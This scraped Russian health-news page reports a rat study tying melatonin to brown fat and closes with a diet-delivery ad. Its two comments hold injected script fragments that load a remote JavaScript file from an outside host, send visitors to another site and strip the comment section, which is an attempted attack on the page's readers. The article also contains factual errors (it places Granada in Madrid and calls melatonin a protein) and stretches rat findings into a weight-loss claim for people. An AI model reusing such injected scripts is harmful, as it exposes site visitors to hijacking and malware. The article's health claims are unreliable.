Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сон сжигает жир! Сколько ...  >>  Сон сжигает жир! Сколько спать?
 
Обратная связь
 

Сон сжигает жир! Сколько спать?

Размер шрифта
24 марта 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Испанские ученые обнаружили, что мелатонин – гормон сна – помогает держать массу тела в узде. Он способствует образованию так называемого бурого жира, который состоит из клеток, сжигающих калории вместо того, чтобы запасать их.

Сон сжигает жир! Сколько спать?

Исследование проводилось на базе университета Гранады (Мадрид, Испания) в сотрудничестве с экспертами из Медицинского центра Техасского университета (Сан Антонио, США). Ученые впервые приблизились к пониманию того, каким именно образом мелатонин влияет на течение таких метаболических расстройств, как сахарный диабет и гиперлипидемия (повышенный уровень жиров в крови).

В предыдущих публикациях анализировалось влияние этого гормона на динамику ожирения, артериальной гипертензии и диабета 2 типа у крыс с преднамеренно культивированным метаболическим синдромом.

Все наблюдения свидетельствуют в пользу того, что длительное употребление мелатонина повышает количество бурого жира в организме всех крыс: как больных, так и здоровых.

«Бурые» жировые клетки формируют обширные бобовидные пласты в паху и забрюшинной области. Считается, что эта уникальная ткань принимает непосредственное участие в терморегуляции – поддержании необходимой температуры тела. Белок UPC1, который обнаруживается в митохондриях бурых жировых клеток, способствует активации биохимических процессов распада и сжиганию лишних калорий

Мелатонин – белковый гормон, продуцирующийся в темное время суток шишковидным телом головного мозга. Именно это вещество толкает нашу нервную систему в объятия Морфея.

Помимо прочего, мелатонин в незначительных количествах входит в состав некоторых растительных продуктов, таких как: горчица, миндаль, семена подсолнечника, кардамон, кориандр, вишня и другие. С учетом того, что мелатонин почти лишен побочных эффектов, можно с уверенностью утверждать, что повышение доли этих продуктов в рационе питания (вкупе с полноценным ночным сном) является потенциально эффективной профилактической мерой в борьбе с ожирением.

Авторы не сомневаются, что, учитывая важность обнаруженного феномена, им без проблем удастся найти дополнительное финансирование для продолжения исследования. Глобальная цель – экстраполировать полученные данные на человеческий организм и выяснить, помогает ли мелатонин бороться с ожирением и диабетом у людей.

Сколько же спать, чтобы мелатонина было достаточно? Ученные пришли к выводу, что оптимальное время сна – 7-8 часов. При этом они советуют исключить весь свет в спальни, потому что свет прерывает работу мелатонина, не давая вам уснуть и похудеть.

Ну а если вы хотите бодрствовать и худеть, то специально для вас создана «Диета Елены Малышевой». Уже готовая правильная еда будет доставлена в любое удобное для вас место и время. Вам останется только есть и худеть!

Другие секреты похудения раскрываются на страницах нашего специального проекта «Сбрось лишнее».

Результаты данной научной работы были опубликованы в журнале Journal of pineal research.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выключите компьютер! Из-за него вы толстеете!   Жирная еда делает вас стервой!   Перекус, который заставит вас купить штаны на размер меньше в Новом году   Чтобы худеть, надо есть. Что есть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 07 июня 2013Поможет ли зеленый чай похудеть?
 
16 июля 2013Противозачаточные средства могут вылечить анорексию! А помогут ли они похудеть? 15 июля 2013Сколько нужно спать, чтобы помнить все
 

Слайдшоу

1
5 способов похудеть без диеты. Часть 2
Как лишний вес влияет на ваши ноги и их красоту
Привычки, котрые сделают вас толстой в Новом году

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.